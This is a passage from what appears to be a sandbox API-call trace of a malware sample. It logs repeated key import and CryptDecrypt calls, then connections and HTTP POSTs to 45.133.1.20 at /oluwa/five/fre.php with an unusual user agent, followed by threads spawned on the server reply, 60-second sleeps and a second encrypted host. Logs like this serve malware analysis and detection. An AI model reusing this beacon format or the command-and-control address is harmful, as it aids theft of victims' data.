CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0163.632] GetProcessHeap () returned 0x6a0000 [0163.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0163.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.633] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0163.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.635] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0163.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0163.636] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0163.636] GetProcessHeap () returned 0x6a0000 [0163.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0163.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.638] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0163.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.644] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0163.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.645] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0163.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.647] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0163.647] GetProcessHeap () returned 0x6a0000 [0163.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0163.647] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9d98*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0163.647] GetProcessHeap () returned 0x6a0000 [0163.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0163.647] socket (af=2, type=1, protocol=6) returned 0x2dc [0163.648] connect (s=0x2dc, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0163.672] FreeAddrInfoW (pAddrInfo=0x6b9d98*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0163.672] GetProcessHeap () returned 0x6a0000 [0163.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0163.672] GetProcessHeap () returned 0x6a0000 [0163.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0163.673] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0163.675] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0163.675] GetProcessHeap () returned 0x6a0000 [0163.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0163.675] GetProcessHeap () returned 0x6a0000 [0163.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0163.676] GetProcessHeap () returned 0x6a0000 [0163.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0163.676] GetProcessHeap () returned 0x6a0000 [0163.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0163.677] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0163.678] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0163.678] GetProcessHeap () returned 0x6a0000 [0163.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0163.678] GetProcessHeap () returned 0x6a0000 [0163.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0163.678] send (s=0x2dc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0164.120] send (s=0x2dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0164.123] GetProcessHeap () returned 0x6a0000 [0164.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0164.123] recv (in: s=0x2dc, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0164.180] GetProcessHeap () returned 0x6a0000 [0164.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0164.181] GetProcessHeap () returned 0x6a0000 [0164.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0164.181] GetProcessHeap () returned 0x6a0000 [0164.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0164.182] GetProcessHeap () returned 0x6a0000 [0164.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0164.182] closesocket (s=0x2dc) returned 0 [0164.183] GetProcessHeap () returned 0x6a0000 [0164.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0164.183] GetProcessHeap () returned 0x6a0000 [0164.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.184] GetProcessHeap () returned 0x6a0000 [0164.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0164.184] GetProcessHeap () returned 0x6a0000 [0164.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0164.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa94) returned 0x2dc [0164.190] Sleep (dwMilliseconds=0xea60) [0164.192] GetProcessHeap () returned 0x6a0000 [0164.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0164.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0164.215] GetProcessHeap () returned 0x6a0000 [0164.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.217] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0164.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.218] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.222] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.222] GetProcessHeap () returned 0x6a0000 [0164.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.229] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0164.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.232] CryptDestroyKey (hKey=0x6ad020) returned 1 [0164.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.234] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0164.234] GetProcessHeap () returned 0x6a0000 [0164.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.235] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0164.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.236] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0164.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.237] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0164.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.238] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0164.238] GetProcessHeap () returned 0x6a0000 [0164.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0164.238] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0164.238] GetProcessHeap () returned 0x6a0000 [0164.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0164.239] GetProcessHeap () returned 0x6a0000 [0164.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.239] GetProcessHeap () returned 0x6a0000 [0164.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0164.240] GetProcessHeap () returned 0x6a0000 [0164.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0164.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.243] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.249] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0164.257] GetProcessHeap () returned 0x6a0000 [0164.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.258] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0164.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.259] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.260] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.260] GetProcessHeap () returned 0x6a0000 [0164.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.262] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0164.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.265] CryptDestroyKey (hKey=0x6ad560) returned 1 [0164.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.266] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0164.266] GetProcessHeap () returned 0x6a0000 [0164.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.268] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0164.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.269] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0164.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.270] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0164.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.271] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0164.271] GetProcessHeap () returned 0x6a0000 [0164.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0164.271] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0164.271] GetProcessHeap () returned 0x6a0000 [0164.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0164.271] socket (af=2, type=1, protocol=6) returned 0x2e0 [0164.271] connect (s=0x2e0, name=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0164.298] FreeAddrInfoW (pAddrInfo=0x6b9e60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0164.299] GetProcessHeap () returned 0x6a0000 [0164.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0164.299] GetProcessHeap () returned 0x6a0000 [0164.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0164.299] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0164.300] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0164.300] GetProcessHeap () returned 0x6a0000 [0164.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0164.301] GetProcessHeap () returned 0x6a0000 [0164.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0164.302] GetProcessHeap () returned 0x6a0000 [0164.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0164.302] GetProcessHeap () returned 0x6a0000 [0164.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0164.303] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0164.305] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0164.305] GetProcessHeap () returned 0x6a0000 [0164.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0164.305] GetProcessHeap () returned 0x6a0000 [0164.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0164.306] send (s=0x2e0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0164.307] send (s=0x2e0, buf=0x6bb998*, len=159, flags=0) returned 159 [0164.307] GetProcessHeap () returned 0x6a0000 [0164.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0164.307] recv (in: s=0x2e0, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0164.377] GetProcessHeap () returned 0x6a0000 [0164.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0164.379] GetProcessHeap () returned 0x6a0000 [0164.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0164.380] GetProcessHeap () returned 0x6a0000 [0164.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0164.380] GetProcessHeap () returned 0x6a0000 [0164.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0164.380] closesocket (s=0x2e0) returned 0 [0164.381] GetProcessHeap () returned 0x6a0000 [0164.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa10 | out: hHeap=0x6a0000) returned 1 [0164.381] GetProcessHeap () returned 0x6a0000 [0164.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.382] GetProcessHeap () returned 0x6a0000 [0164.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0164.382] GetProcessHeap () returned 0x6a0000 [0164.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0164.383] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x318) returned 0x2e0 [0164.388] Sleep (dwMilliseconds=0xea60) [0164.389] GetProcessHeap () returned 0x6a0000 [0164.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0164.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0164.405] GetProcessHeap () returned 0x6a0000 [0164.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.409] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0164.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.410] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.411] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.411] GetProcessHeap () returned 0x6a0000 [0164.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.412] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0164.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.413] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0164.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.414] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0164.414] GetProcessHeap () returned 0x6a0000 [0164.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0164.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.415] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0164.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.416] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0164.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.419] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0164.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.426] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0164.426] GetProcessHeap () returned 0x6a0000 [0164.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0164.426] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0164.426] GetProcessHeap () returned 0x6a0000 [0164.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0164.427] GetProcessHeap () returned 0x6a0000 [0164.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0164.427] GetProcessHeap () returned 0x6a0000 [0164.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0164.427] GetProcessHeap () returned 0x6a0000 [0164.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0164.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0164.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0164.444] GetProcessHeap () returned 0x6a0000 [0164.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0164.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.445] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0164.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.446] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0164.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.447] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0164.447] GetProcessHeap () returned 0x6a0000 [0164.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0164.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.448] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0164.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.449] CryptDestroyKey (hKey=0x6ad020) returned 1 [0164.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0164.452] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0164.453] GetProcessHeap () returned 0x6a0000 [0164.453] 